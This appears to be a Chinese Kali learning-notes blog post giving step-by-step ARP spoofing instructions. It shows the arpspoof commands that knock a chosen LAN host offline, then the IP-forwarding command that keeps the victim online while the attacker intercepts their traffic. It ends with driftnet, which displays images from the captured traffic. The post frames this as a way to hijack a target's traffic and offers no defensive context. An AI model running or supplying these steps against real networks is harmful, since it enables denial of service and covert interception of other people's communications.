美文网首页茴香豆安全 - KALI学习笔记
茴香豆安全 - ARP断网攻击与流量劫持

茴香豆安全 - ARP断网攻击与流量劫持

作者: wycdavid | 来源:发表于2020-05-22 15:09 被阅读0次

    一、ARP断网攻击

    其实断网不是目的,只是在ARP欺骗过程中如果设置不正确会导致目标断网
    我们真正要做的是,是通过ARP欺骗来对目标进行流量劫持

    1. 使用的工具是 arpspoof ,如果kali中没有安装,先安装
    apt-get install arpspoof
    
    • 如果提示安装失败,执行下面的命令
    apt-get install dsniff ssldump
    
    1. 使用arpspoof,来攻击目标,前提是你和目标在同一个局域网,可以互相访问,你知道目标的IP地址,怎么扫描局域网中的IP地址这个以后再说
    • 有兴趣的同学可以先看下arpspoof的使用帮助
    arpspoof -h
    
    • 或者跳过,直接执行下面的命令来攻击目标
    arpspoof -i eth0 -t 192.168.1.129 192.168.1.1
    

    命令格式:arpspoof -i 网卡 -t 目标ip 局域网的网关
    网卡:当前你的kali系统的网卡,可以通过ifconfig或者 ip a 查看,比如eth0,ifconfig命令渐渐被淘汰了
    目标IP:192.168.1.129 (请自行替换)
    网关:192.168.1.1 (请自行替换)

    • 不出意外,此时目标机已经断网了

    二、ARP流量劫持

    目标机之所以会断网,我个人理解,是因为目标机发给网关的流量,被我们给截获了。
    如果既要保证我们可以截获目标机的流量,同时也不影响他的上网,那么就只要设置转发就可以了

    1. 流量转发,执行下面的命令,
    echo 1 > /proc/sys/net/ipv4/ip_forward
    

    echo 是一个输出命令,上面的命令简单解释就是 把1 写入到 /proc/sys/net/ipv4/ 目录下 ip_forward 文件中,其实就是修改配置文件中的值,1转发,0不转发

    • 此时你再执行上面的 arpspoof 就会发现目标机器不断网了,但是他的流量也被我们给劫持了
    1. 查看所劫持流量中的图片
    • 劫持了流量肯定是为了做流量分析而达到一定的目的,这里就不展开说了
    • 这里可以介绍一个工具driftnet,可以查看流量中的图片
    • 执行下面的命令就会弹出一个框,然后显示当前网卡eth0流量中的图片
    driftnet -i eth0
    

    相关文章

      网友评论

        本文标题:茴香豆安全 - ARP断网攻击与流量劫持

        本文链接:https://www.haomeiwen.com/subject/gizfahtx.html